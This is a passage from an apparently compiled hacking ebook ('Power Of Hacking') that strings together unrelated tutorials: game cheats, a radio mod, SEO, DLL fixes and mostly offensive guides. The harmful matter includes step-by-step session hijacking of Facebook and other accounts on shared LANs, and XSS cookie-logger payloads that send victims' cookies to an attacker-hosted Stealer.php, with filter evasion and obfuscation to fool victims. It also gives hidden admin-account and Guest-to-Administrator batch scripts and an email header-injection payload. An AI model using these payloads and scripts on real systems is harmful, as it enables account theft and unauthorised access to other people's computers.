Now activate ALL the EasyWrite options and go back to the game. You will see that everything is working perfect. You have Infinite Health and the enemies are dying with One Hit. You could also disable Infinite Health and you will still kill enemies with One Hit. Or disable One Hit Kill and you will still have Infinite Health.

Phew … that was a long tutorial, wasn’t it? Still … I hope that I have explained everything good enough so that you understand it.

Now the best thing for you to do would be to hack a few iso games. Install a few of them and try to hack Health, Ammo, make One Hit Kills, etc. Mail:mtahirzahid@yahoo.com

Page 173


Power Of Hacking® I also advise you to learn asm, because when you can asm, you can do pretty much everything you want for example hacks like Kill All, Rapid Fire, Super Speed, Super Jump, Invisibility, Get All Weapons/Items, Enemies don’t Shoot, etc. I know most of the hacks are hard to do without SIce, but you should at least try to make a few of them. It always depends on your coding skills ;)

Still … I hope u managed everything in this tutorial and learned from it, since at the moment this one is the most extensive one.

If you have questions/comments or suggestions for another tutorial then email me at: mtahirzahid or contact me on -->

For more tutorials visit: http://mtahirzahid.blogspot.com

A big THANK YOU is flying out to apache- for being the 1st who is putting this tutorial on his site.

greetz are also flying out to these people and friends (in alphabetical order): [Death], [sheep], allen, ape, CoaxCable, Drax, HaD-Team, jmp_fce4, m1indphuck Mango, maZel, spookie, toker, Trelpie, Tron, Tsongkie and of course VegitoSSJ.

You are allowed to spread this tutorial to any sites as long as the content of this

Mail:mtahirzahid@yahoo.com

Page 174


Power Of Hacking速 tutorial is exactly the same as the one on http://mtahirzahid.blogspot.com 12 fbi tools:meatasploit

2- ads locator 2004.zip 3- historian 1.4.rar 4- mui cacheview 1.00.zip 5- NetworkMiner 0.87.zip 6- regripper 2.02.zip 7- systemreport 2.5.rar 8- usb-history r1.zip 9- windows file analyzer 1.0.zip 10- disk investigator 1.4.exe 11- live view 0.6.exe 12- WinPcap 4.02.exe

Mail:mtahirzahid@yahoo.com

Page 175


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 176


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 177


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 178


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 179


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 180


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 181


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 182


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 183


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 184


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 185


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 186


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 187


Power Of Hacking速

Transistor Radio Hack!

Mail:mtahirzahid@yahoo.com

Page 188


Power Of Hacking速 Step 1: Get Started

The only thing you need for this project is an AM/FM transistor radio, an older model that has a physical adjustment for tuning rather than digital. This will be a wheel or slider that changes stations. The only tool you should need is a small screwdriver. Open the radio by removing all the screws. Watch for the hidden screws located in the battery compartment. TIP: Stick them to a magnet so you don't lose them. Step 2: Locate the Components

Mail:mtahirzahid@yahoo.com

Page 189


Power Of Hacking速

Now we need to locate the components we will be modifying. First, look for the main tuning capacitor. It will be a square, usually clear, compartment that houses the tuning controls. It will be right next to the tuning wheel. Near the main tuning capacitor you will see two coils of copper wire. These are what control and limit the frequency range of the radio Step 3: Tuning Transformers

The tuning transformers are square transformers with tuning slots in the top. Mine had five. TIP: The best way to locate the one we will be adjusting, is to look for a couple of diodes closest to one Step 4: Get to Work Mail:mtahirzahid@yahoo.com

Page 190


Power Of Hacking速

Now, turn on the radio and tune it to the clearest station on the high end of the FM band, near 108. TIP: Confirm you have found the correct copper coil (one controls AM, the other FM) by touching it with a screwdriver. You should hear a change in the station. Using your screwdriver, slightly spread out the copper coils. The station will fade away and you have just increased the range on the upper end of the FM band beyond 108MHz!. Adding/Modifying User Accounts In Windows Via "CMD

Hello guys! Today i will show you some of the cool CMD tricks. If you don't know on how Mail:mtahirzahid@yahoo.com

Page 191


Power Of Hacking® to launch CMD then go to Start>Run and type there CMD and hit enter. So a command promt window will appear. Like shown above So now you have CMD and you can add a new user by command below: C:>net user username /ADD Where username is the name of your new account. And remember, try and make it look inconspicuous, then they‟ll just think its a student who really is at school, when really, the person doesn‟t EXIST! IF you wanna have a password, use this instead: C:>net user username password /ADD Where password is the password you want to have. So for instance the above would create an account called „username‟, with the password being „password‟. The below would have a username of „Usman‟ and a password of „LULX‟ C:>net user Tahir LULX /ADD Right then, now that we can create accounts, let‟s delete them:) C:>net user Tahir /DELETE This will delete poor Usman's acount With the help of CMD. Let‟s give you admin priveleges:) C:>net localgroup administrator Tahir /ADD This will make Tahir an admin. Remember that some places or computers may not call their admins „adminstrator‟ and so you need to find out the name of the local group they belong to. You can list all the localgroups by typing C:>net localgroup Running .exe files you can‟t usually run In the command prompt, use cd (change directory) to go to where the file is, use DIR to get the name of it, and put a shortcut of it on to a floppy. Run the program off the floppy disk. :D A small trick for comic books lover If you are a comic book lover like me and while reading online your net keeps on disconnecting then i have a small trick for you. Thing you need is Idm Website grabber First of all download it and then install it After installation go to the folder and open idm grabber a window will appear like this click on the grabber like shown in the picture

Mail:mtahirzahid@yahoo.com

Page 192


Power Of Hacking速

After hitting it a window will appear and start filling blanks and information

Then grab site and all the files of that site will be found in destination folder and start reading comic books offline without any fear. 4 Steps to Prevent Man in the Middle Attack ARP Poisoning in LAN What is man in the middle attack? according to wikipedia: - In cryptography and computer security is a form of active eavesdropping in which the attacker makes independent connections with the victims and relays messages between them, making them believe that they are talking directly to each other over a private connection, when in fact the entire conversation is controlled by the attacker. The attacker must be able to intercept all messages going between the two victims and inject new ones, which is straightforward in many circumstances (for example, an attacker within reception range of an unencrypted Wi-Fi wireless access point, can insert himself as a man-in-the-middle). And what is ARP poisoning or ARP spoofing? according to wikipedia: a technique whereby an attacker sends fake ("spoofed") Address Resolution Protocol (ARP) messages onto a Local Area Network. Generally, the aim is to associate the attacker's MAC address with the IP address of another host (such as the default gateway), causing any traffic meant for that IP address to be sent to the attacker instead. The man in the middle attack can happen because the attacker modified the ARP table(ARP spoofing) and change the ARP mapping to malicious attacker computer. Here I try to describe using picture(courtesy of: irongeek.com).

Mail:mtahirzahid@yahoo.com

Page 193


Power Of Hacking速

If we as a human absolutely we will know who is Alan and who is Brian by recognizing them from their face, but for our computer they depend on the ARP table network mapping (OSI layer 2 and layer 3). <table border="1" cellpadding="1" cellspacing="1" style="width: 500px;"> Name IP Address MAC Address Alan 192.168.1.2 00-00-00-00-00-00-00-01 Brian 192.168.1.3 00-00-00-00-00-00-00-02 Cracker 192.168.1.88 00-00-00-00-00-00-00-03 table> So if Alan want to connect to Brian, the computer will translate Brian IP address(192.168.1.3) to its MAC address 00-00-00-00-00-00-00-02. The correct way is should be like that, but because the attacker doing an ARP spoofing or ARP poisoning they will change the ARP mapping. If the network already poisoned, when Alan want to send packet to Brian, Alan will translate Brian(192.168.1.3) with MAC 00-00-00-00-00-00-00-03 and vice versa. In this tutorial I will show you how the ARP spoofing can be happen and how to prevent it in your own computer so you will not be the victim. The scenario for today tutorial I will use Windows 7 as victim and Kali Linux as attacker. 4 Steps to Prevent Man in the Middle Attack ARP Poisoning in LAN: Before start, you can download the Static ARP changer tools to change the ARP routing automatically (128% virus free guaranteed) Download Static ARP Changer 1. First I will show you my Windows 7 ARP table before poisoned by the attacker arp -a

Mail:mtahirzahid@yahoo.com

Page 194


Power Of Hacking®

the red box in the picture above is victim router address and router MAC address is xx-xxxx-5a-26-94. Victim IP address is 192.168.8.100. Here is the attacker IP and MAC info:

2. When attacker doing ARP spoofing by using arpspoof and attacking the victim: arpspoof -i eth0 -t 192.168.8.100 -r 192.168.8.8

Description: -i eth0 –> attacker use the eth0 interface to perform the attack. -t 192.168.8.100 –> attacker targeting the IP address 192.168.8.100. -r 192.168.8.8 –> attacker will intercept the traffic between -t and -r where -r is the remote host or the router 3. When victim run the arp -a command again in his computer, the router MAC address was changed into the attacker computer.

Mail:mtahirzahid@yahoo.com

Page 195


Power Of Hacking® that's mean every transaction the victim made will go through attacker computer first and then go to the real router. We need to protect the ARP mapping table to make the attacker cannot do this to us. 4. We need to run this command in our Windows PC arp -s 192.168.8.8 xx-xx-xx-5a-26-94 Description: -s –> add a static ARP table 192.168.8.8 –> your router IP address xx-xx-xx-5a-26-94 –> your router MAC address Note: If you get this error "The ARP entry addition failed: Access is denied." try to run this command to know your interface name: netsh interface show interface

and then run this command to add static ARP: netsh interface ip add neighbors "Wireless Network Connection" "192.168.8.8" "xx-xx-xx5a-26-94" now when we run again the arp -a command, our ARP table changed to static

and when attacker run ARP spoofing again, our ARP table won't changed because we already make it static Conclusions: 1. To prevent ARP spoofing and man in the middle attack in your local area network you need to add a static ARP. Mail:mtahirzahid@yahoo.com

Page 196


Power Of Hacking速 2. This trick become troublesome if your router changed frequently, so if you use this prevention method you need to delete the old one and add the new one if it changed 3. You can download and use my Static ARP routing changer to change your ARP static routing automatically Download Static ARP Changer hope you found it useful Black Hat and White Hat SEO Techniques

Block Hat (Spam) SEO In the field of SEO, Black Hat is the unethical approach to SEO and must avoid at all costs. Webmasters SEO will strengthen on their position quickly bump and sit on top of Google. That is not the case. At some point will be captured and thrust directly from the search engines and permanently banned.

Avoid shortcuts and clear the address of a company you grim search engine ranking # 1 at night promises for a ridiculously low price (the real TIMO shouting!) That is a practice which deliberately deceiving the search engines black hat only hurts the long term. The Black Hat SEO includes the following unethical practices: * Filling the keyword - put too many keywords in your content / site (it make no sense) think about that black hat should be avoided. * Hidden text - that puts white text against white background. The mask - one thing visitors see on websites but the content is presented in a different way to search engine spiders search. * Filling the Cookie - Cookies are text files that are stored in the web browsers on computers (due to third party sites). The catch: Consumers visiting the website within 60 days (a cookie is stored for 60 days) and a purchase - as a result, the affiliate Mail:mtahirzahid@yahoo.com

Page 197


Power Of Hacking速 receives a commission from the sale fraudulent. Detours * - creating a full page of unique content and once you get a high-aligned, you redirect to another page on your site (i.e. shopping cart page) Alignment # 1 on Google You can go to the top when it comes to Google rankings. First you have to find out how much you know about SEO and examine competition in the market. When you do so at the top of Google, the big things happen for you and your business! You start to get busy and you have more than enough companies / customers. Check out these white tips of the hat following: Spend at least * 30 minutes in a day working with your SEO - it pays to this everyday worthwhile investment to make your site / business! * You do not need to know about SEO - there is much conflicting information out there. Research on the various sites, resources, etc... And choose which work best for your site / business! * Outsource SEO work to a professional if you feel that you do not know enough about SEO - but it helps to know the basics of SEO. A good SEO expert will always guide you in the right direction and investigate the companies / entities reputable and make sure you hire an SEO Pro!

White Hat (Ethical) SEO A white hat SEO (white hat) is called an "ethical stance" that the abuse of electronic media opposes. Do the right thing: Optimize the text (where the title and description where it should. Implements accessibility standards: (an example to understand what a search engine that contains a picture, the parameter = "alt text to add" and a brief description). Create a link structure: the sites must be in the form of a link between self-re-run.

Mail:mtahirzahid@yahoo.com

Page 198


Power Of Hacking® A black hat (black hat) is the opposite of White Hat, it attempts to breach this term is considered an ethical SEO tied. You can use low quality links or unwanted pornographic sites, pharmacies, etc. Those who practice Black Hat SEO, "bloated" PR placing a link on a page containing a high page rank, but if it is deleted from the PR of the page are in the next update of Google. A Black Hat SEO (Spam) does the following: Clocking: (a sewer hidden behind a seemingly normal web search engines or travel without disabled dirty look at the content mostly plain text, h1, bold and many links that would never on the cover. This is the most common technique among spammers and is considered counterproductive, because the hidden text should resulted web users). Buy links (back links Google shows that it is illegal). Start-ups (it is automatically generated content or copying of garbage, you should try your pages in search engine indexes, scattering in different servers, domains, other content formats). Abuse of words (A spam puts a title search words all types of oneto the larger number of web searches without coherence angle). Duplicate content (take a text and put it on multiple pages to get indexed more pages). Hidden text (hidden links and keywords on a website using hidden dives, font’s invaluable trick or white text on white background). The biggest problem with Black Hat SEO is the consequences that may arise for the owner of the page. The most ominous is the complete abolition of the Google results. This is usually due to SEO that Google detects and punishes malicious page in this way. Another important term to know Gray hat, referring to the practices from one place to another. Using both methods, such as favorable for the page. Content Central ™ electronic document management in the All-In-One document management solution makes document capture, retrieval, and management simple. It gives organizations easy access to information. This all-in-one, browser-based document management system provides access, speed and security, what most matters to the organizations. White Hat SEO Tips when it comes to ethical SEO technique, the white hat is how aggressively you need to approach SEO. Think of the "value" when it comes to white hat SEO. The white hat is ethical search technique used by big players like Google. White hat SEO tactics with aggressive, "not until you reach the previously" - every

Mail:mtahirzahid@yahoo.com

Page 199


Power Of Hacking® time! The white hat SEO is any element that you add to your sites, Blogs, etc... That the added value and credibility. Common website hacking methods! i will show you those common methods using which these sites are hack. Lets see an overview below : 95% of web applications have following vulnerabilities: •Cross-site scripting (80 percent) •SQL injection (62 percent) •Parameter tampering (60 percent) •Cookie poisoning (37 percent) •Database server (33 percent) •Web server (23 percent) •Buffer overflow (19 percent) Some are explained below, I will post details later.. 1. Cross site scripting : Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy. 2.SQL injection SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. 3.Parameter tampering The Web Parameter Tampering attack is based on the manipulation of parameters exchanged between client and server in order to modify application data, such as user credentials and permissions, price and quantity of products, etc. Usually, this information is stored in cookies, hidden form fields, or URL Query Strings, and is used to increase application functionality and control. Example: Leta take an example in which, a web application that permits a user to select his profile from a combo box and debit the account: http://www.attackbank.com/default.asp?profile=741&debit=1000 In this case, an attacker could tamper with the URL, using other values for profile and debit: http://www.attackbank.com/default.asp?profile=852&debit=2000 Mail:mtahirzahid@yahoo.com

Page 200


Power Of Hacking速 This can be done by various addons available for mozilla. Cookie poisoning: Cookie Poisoning attacks involve the modification of the contents of a cookie (personal information stored in a Web user's computer) in order to bypass security mechanisms. Using cookie poisoning attacks, attackers can gain unauthorized information about another user and steal their identity. This involves the use of cookie stealing script and an addon or software to replace these cookies with yours. Buffer overflow: In computer security and programming, a buffer overflow, or buffer overrun, is an anomaly where a program, while writing data to a buffer, overruns the buffer's boundary and overwrites adjacent memory. Buffer overflows can be triggered by inputs that are designed to execute code, or alter the way the program operates. This may result in erratic program behavior, including memory access errors, incorrect results, a crash, or a breach of system security. They are thus the basis of many software vulnerabilities and can be maliciously exploited. The principle of exploiting a buffer overflow is to overwrite parts of memory that are not supposed to be overwritten by arbitrary input and making the process execute this code. To see how and where an overflow takes place, look at how memory is organized. A page is a part of memory that uses its own relative addressing, meaning the kernel allocates initial memory for the process, which it can then access without having to know where the memory is physically located in RAM. Cookie Stealing Attack: Hack Any Account like Facebook ,Twitter , Gmail ,Hotmail ,Skype and yahoo etc.

Using this method you can hack Any Account like Facebook ,Twitter , Gmail ,Hotmail ,Skype and yahoo etc. this works At LAN(local Area Network) . its best place to hack at university, cafe , public place where computer are on one LAN simple Example WI-Fi. What is Cookies And how the use of stealing Mail:mtahirzahid@yahoo.com

Page 201


Power Of Hacking® cookies? Cookies are file’s that stored on Any computer’s By any website when a you visits them . the cookie used by the web server to check the authenticate the Real user . like you Enter Login in Facebook then a unique string’s Generated and the one copy saved in the web server and other is saved on your Browser as a Cookie file . both are matched when you open a Account. so then finally we will start. Step 1: Download the Wire Shark and install it. Step 2: Next open the wire shark and then click on interface. Step 3: Next choose a interface which is received and sending packet and click on start Step 4: Continue the sniffing for around like 10 minutes. Step 5: After a maximum 10 minute stop the sniffing by going to a capture menu. Step6: its important step, now filter to http. cookie contains “datr”. Then filter the all search for http cookies with a name of datr and there is Facebook authentication’s cookie. Step 7: Now click on it and then goto the copy > Bytes > Printable Text only Step 8: Now for next step you must have 3 thing, 1. Mozilla Firefox [browser] 2. Grease Monkey[add-on] 3. Cookie injector[code] and then open facebook. com make sure you are not login Step 9: Press the button Alt C to bring up a cookie injector and then Simply paste in a cookie value Mail:mtahirzahid@yahoo.com

Page 202


Power Of Hacking速 into it. Step 10 Now refresh your page so then finally you Enter the Victim Account. Cross Site Scripting (Using a hole to Hack with XSS) 1. 2. 3. 4.

We find a blog which allows users user to input data. This data is displayed, unedited or sanitised on the blog index page. We want to inject a XSS to log the administrative users cookies. We want to login with the cookie we have stolen.

Note : This is for educational purpose for designers or for my readers to make there website safe. What we shall need : Heres a list of things you will need through-out the tutorial : Mozilla Firefox (Use an old version not latest). FF addon : Add & Edit Cookies. FF addon : Live HTTP Headers. An ACTIVE cookie logger.(Google it yourself i don't want to put it here and to break laws.) A basic understanding of JavaScript is an advantage, but not essential.(Refer www.w3schools.com ) A XSS vulnerability to test and exploit. Refer to my Old post On XSS. Hosting is up to you, try this free PHP web host , 000webhost etc. The desire and dedication to learn. [Yourself.] Identifying & Exploiting the Vulnerability: Identifying a XSS vulnerability can be pretty straight forward in most cases. A typical method of testing for a XSS vulnerability would be infamous 'Alert' test. Anyone with a basic knowledge of JavaScript will know what this is. This test will make an alert box, or message box, pop up on the screen. This is done by executing the JavaScript function Alert. <script>alert('hackersthirst.com')</script> This would display a message box with hackersthirst.com as the message. To perform this test we want the page in question to print out the script, so the browser will execute it. So in this case using the included vulnerable test page, input the string <script>alert('hackersthirst.com')</script>. Now the page will execute this and you should get an alert box displaying the message 'hackersthirst.com'. Another method of testing for vulnerability is the document.write method. The same Mail:mtahirzahid@yahoo.com

Page 203


Power Of Hacking速 concepts and structure is applied to this method as the alert method, we're just using the document.write function instead of the alert function. So this time we insert : <script>document.write('hackersthirst.com')</script> This time the script will return the string 'hackersthirst.com', (without quotes), and will write it to the page, where the string is supposed to be shown. Below i am giving a short description on how to exploit this. Exploiting XSS hole : After identifying the XSS hole what a hacker will do . Its demonstrated by given example : (in this example we will be covering cookie stealing), we will go over setting up our logger and a few methods of doing so. Example 1 : Our cookie logger URL : http://site.com/cookielogger.php Vulnerable Page : http://someblog.com/index.php Injection Point : http://someblog.com/post.php Now we have all this setup, we can crack on. You can use the following methods to log cookies using JavaScript : <script>location.href='http://site.com/cookielogger.php?cookie='+cookie</script> <script>document.location='http://site.com/cookielogger.php?cookie='+cookie</script> <script>window.open('http://site.com/cookielogger.php?cookie='+cookie)</script> <script>window.location='http://site.com/cookielogger.php?cookie='+cookie</script> Once you have posted this to the blogging system, and it's echoed on the index.php, we just have to be patient and hope the administrator of the site visits it soon, so we can get their cookie. Another method I want to go over is the <script src=> method. The only difference with this one is that the main script is kept off-site, and is fetched by the <script src> tag, and then executed on the page. This is advantageous in many ways. It can reduce the size of our script on the target site for one, and secondly it can be changed if we want to change the functionality of our XSS. This type of XSS is usually more practical for worms, and keyloggers, but is definitely worth knowing. Example 2 : Our cookie logger URL : http://site.com/cookielogger.php Our script URL : http://site.com/script.js Vulnerable Page : http://someblog.com/index.php Mail:mtahirzahid@yahoo.com

Page 204


Power Of Hacking速 Injection Point : http://someblog.com/post.php Here is how we include or foreign script : <script src='http://site.com/script.js'></script> Inside the script we just need the logger, use a function from Example 1. An example of our script would be : location.href='http://site.com/cookielogger.php?cookie='+cookie; Again, like anything, patience is a virtue. Here the site is your own hosting site to host the cookielogger srcipt.

Possible Limitations and Basic Filter Evasion Techniques : The filter I will show you is a filter which removes the '<script>' and '</script>' tags. While a very basic and common method of filtering, it is ridiculously easy to bypass. Example 1 ~ Tag Removal : I insert the JavaScript : '<script>alert('XSS')</script>', and it returns the string : alert('XSS'). Never fear, there is away around this. If I now insert this : '<scr<script>ipt>alert('XSS')</scr</script>ipt>' Now the script will remove the tags, and echo what's left, which is : <script>alert('XSS')</script>. There are other methods also. Use Google.

Well if your hosting site is too long then a smart tip is this that you use ip instead of URL.

What to do when you get cookies in txt. file in hosting : These are the steps: 1. 2. 3. 4.

Open FireFox. Click on Tools in the menu bar. Click on Cookie Editor. Click on Add.

Mail:mtahirzahid@yahoo.com

Page 205


Power Of Hacking® Adding the cookie 5.In name, add the name of that cookie, (the bit before the =) 6.In content, add the value. 7. In host, add .site.com, unless its a sub domain or otherwise stated, (the dot infront of the domain name is important). 8.In path, write /, unless you have the exact path where you want the cookie to be active. Repeat this procedure until every cookie has been added. Once this is done, you can navigate to the website and check to see if you have logged in. So, Thats a short guide on XSS. Cross Site Scripting

if anyone, tries these hacks against any organization or whatever that makes him to trespass the security measures and brings him under the legal prosecution. This tutorial is intended for the improvement of security and for PenTesting, investigations by legal security agencies. Requirements:    

A cookie Stealer code : Get it from here Free Web hosting service Basic Knowledge about XSS Basic Knowledge about Computer Cookies

Cookie stealing is the process of exploiting the XSS vulnerability (Non-persistent/persistent) and steal the cookie from the victim who visit the infected link. These cookie will be used to compromise their accounts. Step 1: Creating Cookie Stealer PHP file Get the Cookie stealer from the link i mentioned. In that post, i have explained three versions of cookie stealer. We are going to use the third version.   

Copy the code. Open Notepad and paste the code Save the file with .php extension Eg: Stealer.php

Mail:mtahirzahid@yahoo.com

Page 206


Power Of Hacking® Now create New file and save it as log.txt (leave it as blank). Don‟t change the name , this is the file name what we give in php file. Now you will have two files; 1. Stealer.php 2. log.txt What these two files do exactly? The above Stealer.php file get ip address,cookie and stores the data in log.txt file. The log.txt has cookies , ip address details. Step 2: Register in a free web-hosting service and login into your cpanel. Now open the File Manager in cpanel. Upload the Stealer.php and log.txt to root folder or public_html folder. Now the stealer will be at hxxp://www.YourSite.com/Stealer.php . Step 3: Exploiting the XSS Vulnerability So Far , we have sharpened our saw. Now we are going to use it. Once you set up everything and find a Vulnerable site,then inject the following code in the Vulnerable sites. <script>location.href = „http://www.Yoursite.com/Stealer.php?cookie=‟+document.cookie;</script> For example: hxxp://www.VulnerableSite.com/index.php?search=<script>location.href = „http://www.Yoursite.com/Stealer.php?cookie=‟+document.cookie;</script> Cookie Stealing with Non-Persistent vs Persistent XSS: Persistent: if you inject this code in Persistent XSS vulnerable site, it will be there forever until admin find it. It will be shown to all users. So attackers don‟t need to send any link to others. Whoever visit the page, they will be vicim. Non-Persistent: In case of Non-persistent attack, attacker will send the link to victims. Whenever they follow the link, it will steal the cookie. Most of sites are vulnerable to Non-persistent XSS . In Non-persistence, Attackers will send the injected link victims. For example: hxxp://www.VulnerableSite.com/index.php?search=<script>location.href = „http://www.Yoursite.com/Stealer.php?cookie=‟+document.cookie;</script> The above link is clearly shows the scripts. Hackers can Hex-encode this script so that victim can‟t see the script. For Example: hxxp://www.VulnerableSite.com/index.php?search=%3c%73%63%72%69%70%74%3e%6c% 6f%63%61%74%69%6f%6e%2e%68%72%65%66%20%3d%20%27%68%74%74%70%3a%2f% Mail:mtahirzahid@yahoo.com

Page 207


Power Of Hacking® 2f%77%77%77%2e%59%6f%75%72%73%69%74%65%2e%63%6f%6d%2f%53%74%65%61% 6c%65%72%2e%70%68%70%3f%63%6f%6f%6b%69%65%3d%27%2b%64%6f%63%75%6d% 65%6e%74%2e%63%6f%6f%6b%69%65%3b%3c%2f%73%63%72%69%70%74%3e Still , the link look long. The attacker use one more trick to hide the long url i.e url shortening sites. There are lot of sites that shorten the long url into tiny url. For example: hxxp://www.tinyexample.com/twrwd63 Once the victim follow the link, his cookie will be stored in log.txt file. How to be Secure from this attack?    

Use No-Script Addon. This is best protection to stay away from XSS Never Click the Shorten url Sometime you may want to follow the shorten link. If so, then clear all cookies in your browser and visit through Proxy or VPN(it will hide your ip) (Later We will cover security tips for site admin , so stay tuned)

What is XSS? XSS is Known as Cross Site Scripting. XSS is one of Web Application Vulnerability. Using this vulnerability , an Attacker can inject their own Malicious Client side Codes(Javascript,…) into website. This XSS Infected web page can carry malicious codes to other users. The innocent users will run the script(by visiting the page) without knowing the problem behind this. Using XSS , an attacker can steal the cookies, session(session Hijacking), and other confidential data. E-mail Form Injection - Vulnerability E-mail injection is not like SQL-injection because after giving it's name a look person first think of an interesting thing like SQL-injection and it can be used for spoofing . It is the most easy task.I won't make it long Many sites have a contact forum which is called feedback forum.Of course most of them have secure feedback forum but some new site builders can make mistake in it . So a vulnerable feedback forum to E-mail injection can be used for a carbon copy to be sent to another person but not to site . You can find a field in a forum with the name of *YOUR EMAIL*. Just by entering following string you can use their feedback forum "sender@somesite.com%0ACc:victim@victimsdomain.com%0ABcc: victim2@victimsdomain.com" The uper injection would make a carbon copy of your subject to be sent to the users id which you will write at the place of *victim@victimsdomain.com* . As you can see that there is Mail:mtahirzahid@yahoo.com

Page 208


Power Of Hacking® also *victim2* which means that the subject of your mail would be sent to another person also you can add as much people as you want . Back to the first statement of the injection there is written *sender@somesite.com* so just replace it with any site you want . It can be FACEBOOK as in this you might change that statement to *admin@facebook.com* Fighting With Missing .DLL Errors and Recovering .DLL‟s I am going to discuss a major problem which majority of our readers even common computer user faces while running any application. There may be many factors that the application failed to load dialog box appears I‟ll discuss some of them and using my pattern you can fight with almost 90% of such error. 10% you can‟t because actually you won‟t be able to access that what kind of problem is occurring. Well, personally I have resolved many such errors quite successfully without getting impatient. Its my experience that people delete there data of the application which may fail to load. LOL its quite bad We must try to resolve rather than destroying. First error is related to gamers which want to execute games but fail to do so. Direct X .dll error - Mostly in case you try to Run Games:It‟s the case you download a game and you have xp running or even windows seven but there is an old version of direct x installed, So, .dll file missing error occur. Now, you might think that the setup provided for the program is corrupt. And thus you may delete all you hard work. But there is a most easy solution in 3 steps. 1. Go here and download latest version of Direct X 2. Install Direct X and then restart your Computer (Recommended by HT) 3. After that try to execute the program it will run successfully. Other types of .dll errors how to fight with them:First Action-Finding the function of .dll:1. You have to find to copy the name of the .dll shown in the error. 2. Paste that in Google search and make such queries like for example I am trying to find that what is the purpose of msvcrt.dll, I‟ll search:- “Purpose of msvcrt.dll ” and what I got is this in 3rd link:msvcrt.dll is the file helper that runs as part of what is known as the Microsoft Visual C++ Run Time library. (hence, msvcrt) 3. Its enough for you to get now that what‟s its purpose. After that you may now try to resolve that. Here, I‟ll give you two websites which you can use to download such .dll‟s and put them manually in your system. Second Action:-Recovering such .dll‟s:You can make use of these two websites:Mail:mtahirzahid@yahoo.com

Page 209


Power Of Hacking® DLL-ERROR OR DLL-Files    

 

 

 

 

You can search for any .dll file which you want in the above listed sites and can read there description as well as can download them. Copy the name of the .dll file given in the error of the specific application while executing that. Search that .dll in any of the above sites and download it. Mostly, that .dll will go in c:/windows/system32, just copy the downloaded .dll (Extract if in archive phase) and paste in c:/windows/system32 or else if again that specific application doesn’t work then paste that .dll in the directory of the installed program. Hackers Plan to Launch Satellite for Internet to Bypass SOPA The term hacker can be used to mean a several understandings amongst them there are two major‟s one which include “positivity” and the “negativity”. The hackers on facing the internet ban from the United states as a result of SOPA (Stop Online Piracy Act) have made a plan to launch there own satellite in the space for providing an internet which may be free from all kinds of bans and restrictions. This group of hackers belong to Germany. What is this Plan and How is this Satellite going to work? The plan majorly includes on launching a single satellite in the space and which will be a low orbit satellite. That will surely work under the solar power as per the satellite general rule of operation and will communicate with ground stations to make a network. This network will operate like a GPS system and will be called as “Hackerspace Global Grid (HGG)”. When any station will be under the satellite range then it will take the signals and will direct it to the other stations also and a user can gain permanent access to the network. This theory seems to be applied but there are certain hurdles in the plan and which needs to be resolved first. Some Major Basic Hurdles:As we know that with the advancement of the technology we all are able to travel in the space and are able to send the satellites in the orbit of earth using rockets. But still this technology is hell costly also. Plus! There are no vital rules for the space like in case of earth and no single country can govern the space so anyone can make this satellite to stop work without any specific legal permission. In order to make it a geo synchronous the radius of the orbit will surely get decreased and it will move in a fast manner and for the HGG project this distance seems to be large for the signals to be transmitted with a 100% quality aspect. So what’s next with this HGG project? The team is still moving forward to make this possible and its deciding to make the ground stations. If you are fascinated with this project and want such a network for the world them go here: Constellation(http://aerospaceresearch.net/constellation/) to join this project. A project joined by HGG for collaboration. For Further Detailed sources about this news rather than us visit BBC NEWS.

Hack Administrator Account from Guest Account.Yes!! that is quite possible.All you need to do is to follow the below procedure. echo off title Please wait... Mail:mtahirzahid@yahoo.com

Page 210


Power Of Hacking® cls net user add Username Password /add net user localgroup Administrators Username /add net user Guest 420 /active:yes net localgroup Guests Guest /DELETE net localgroup Administrators Guest /add del %0 Copy this to notepad and save the file as "Guest2admin.bat" then u can double click the file to execute or run in the cmd. it works... ----------------------------------------ADMINISTRATOR IN WELCOME SCREEN. When you install Windows XP an Administrator Account is created (you are asked to supply an administrator password), but the "Welcome Screen" does not give you the option to log on as Administrator unless you boot up in Safe Mode. First you must ensure that the Administrator Account is enabled: 1 open Control Panel 2 open Administrative Tools 3 open Local Security Policy 4 expand Local Policies 5 click on Security Options 6 ensure that Accounts: Administrator account status is enabled Then follow the instructions from the "Win2000 Logon Screen Tweak" ie. 1 open Control Panel 2 open User Accounts 3 click Change the way users log on or log off 4 untick Use the Welcome Screen 5 click Apply Options You will now be able to log on to Windows XP as Administrator in Normal Mode. EASY WAY TO ADD THE ADMINISTRATOR USER TO THE WELCOME SCREEN.!! Start the Registry Editor Go to: HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ SpecialAccounts \ UserList \ Right-click an empty space in the right pane and select New > DWORD Value Name the new value Administrator. Double-click this new value, and enter 1 as it's Value data. Close the registry editor and restart. Hacking Password Protected Website’s

Mail:mtahirzahid@yahoo.com

Page 211


Power Of Hacking®

